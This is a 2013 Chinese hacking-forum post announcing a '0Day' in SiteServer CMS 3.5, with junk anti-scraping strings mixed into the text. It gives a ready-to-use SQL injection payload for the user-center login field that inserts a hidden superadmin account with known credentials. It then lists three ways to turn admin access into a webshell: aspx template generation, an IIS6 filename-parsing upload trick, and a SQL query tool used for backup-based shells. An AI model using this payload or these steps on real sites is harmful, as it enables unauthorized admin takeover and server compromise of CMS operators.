找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2626|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版7 _* }+ [4 w4 A: Y
+ n& Y. I3 W) d5 P1 T/ Z2 `
stieserver官网:www.siteserver.cn
  {4 a. x9 v3 t9 L: E* ]8 M4 w; r* I8 ^3 `; Q4 z

9 x! s5 Y, l9 k' e: h8 ?9 E$ H6 }1 [  f/ Z# ]
EXP:
$ [( v2 o- P6 N" B: k6 P
; `/ t7 A5 w1 H8 [! t直接访问UserCenter/login.aspx
3 L7 R6 l% I3 g# o) x/ [# u! C( |! ~4 C0 g9 M7 M  d- w

* M: K1 A" U. v/ J5 l& w* s7 \5 q+ M1 d9 H+ T
用户名处输入:
& G! |" ]0 n- ?9 K3 X0 _/ `( ^. G/ z
. ^! t" }  d0 k2 i123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
+ i4 c8 E3 B, s- d. j
5 X8 B8 |7 E5 U+ Q 5 I6 z8 \$ |3 v* {" N6 T

# \0 W4 T) |1 o9 s( ~4 v6 Q密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
1 g% w  ]' `/ e" X4 [0 P/ T
( k) M. ^! J/ ^& A7 N2 J+ h" Z , o! V, y" L: H8 P9 d) K

/ I  K0 T5 V$ j7 K之后再访问后台SiteServer/login.aspx用插入的用户登陆" u) b3 {0 l; I) N6 x

8 E6 _1 G# N/ E1 W" `
9 C! h: Z0 O" v# u) P9 A9 C5 I: E% p/ D1 R/ L. E( K7 P
后台拿webshell的三种方法:
* z4 {% h: e, x% D6 s, |4 `
0 @6 ^" I( n  ^! J& @4 M- j一、
& N4 c" y3 ?! S& G/ R$ C/ m
; z3 a% e4 v2 m- b; J站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx: U2 [! d! c4 R
) z/ K+ m8 R$ W& {
二、! o) A+ Q0 B. n. V1 W6 L1 l$ D" j
8 s2 w* e: q3 Y7 ~  K5 m% V5 g
成员权限-》添加用户-》用户名为:1.asp& H& m, G) J9 T
8 @% [6 G; }/ r7 U) o
http://127.0.0.1/usercenter/
2 F* R- V& \3 m( A- u8 F* e+ f
/ i# ?; n' ^. Z( Y% Y7 x% d" }用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
. i! E0 H* j& i& \+ @0 F+ j
8 S, ^& O, E: @(ps:后台添加用户时不会验证是否含有非法字符)' ^5 {3 p. r# q8 _- `) o2 c% L3 e
  X$ w" O! Y4 H3 A3 q% M& o
三、
' v1 E+ N' e) K+ q: L! o) O. V( o8 @9 y6 J- i6 ?0 R  S1 z
系统工具-》实用工具-》机器参数查看
3 n) H. G/ w$ i可以看到数据库类型、名称,WEB路径
- x6 u6 C" K4 j8 O' @
0 [4 T$ l2 K  a& Q系统工具-》数据库工具-》SQL语句查询; Q* b( i6 w: I* {5 Q" W5 [5 G; j) }
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
1 F: I+ ?: j1 [; t7 t# k- Q
; L) I3 T+ k9 }; w5 Q1 q' @% o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表